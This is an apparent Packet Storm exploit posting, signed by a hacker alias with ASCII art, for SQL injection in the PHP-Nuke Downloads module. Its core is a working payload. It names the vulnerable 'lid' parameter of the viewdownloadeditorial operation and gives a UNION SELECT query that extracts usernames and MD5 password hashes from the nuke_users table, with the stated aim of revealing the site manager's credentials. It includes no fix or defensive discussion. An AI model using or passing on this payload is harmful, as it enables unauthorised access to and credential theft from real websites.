The PHP-Nuke Name Download module suffers from multiple remote SQL injection vulnerabilities.
7e35b7d694e09cafc94e180627e9c777af5d8f135a71e79136c396080998e78a##################################################################
##################################################################
#
# _ _ _
# .-" "-.
# / \
# | |
# |, .-. .-. ,|
# | )(_o/ \o_)( |
# |/ /\ \|
# (@_ (_ ^^ _)
# _ ) \_______\__|IIIIII|__/_______________________________
# (_)@8@8{}<________|-\IIIIII/-|________________________________>
# )_/ \ /
# (@
#
# +-+-+-+-+-+-+-+-+-+-+
# --+CrAzY CrAcKeR+--
# +-+-+-+-+-+-+-+-+-+-+
#
#
##################################################################
##################################################################
# Example:-
#
# [-] www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=(sql)
#
# [-] Injection code.... ( -1+union+select+username,1,user_password,user_id+from+nuke_users )
#
# [-] www.???.com/modules.php?name=Downloads&d_op=viewdownloadeditorial&lid=-1+union+select+username,1,user_password,user_id+from+nuke_users
#
# [-] you see now password (md5) and the name of the site manager
####################################################################
# Greeting to my friend A7eb Alwrd
####################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed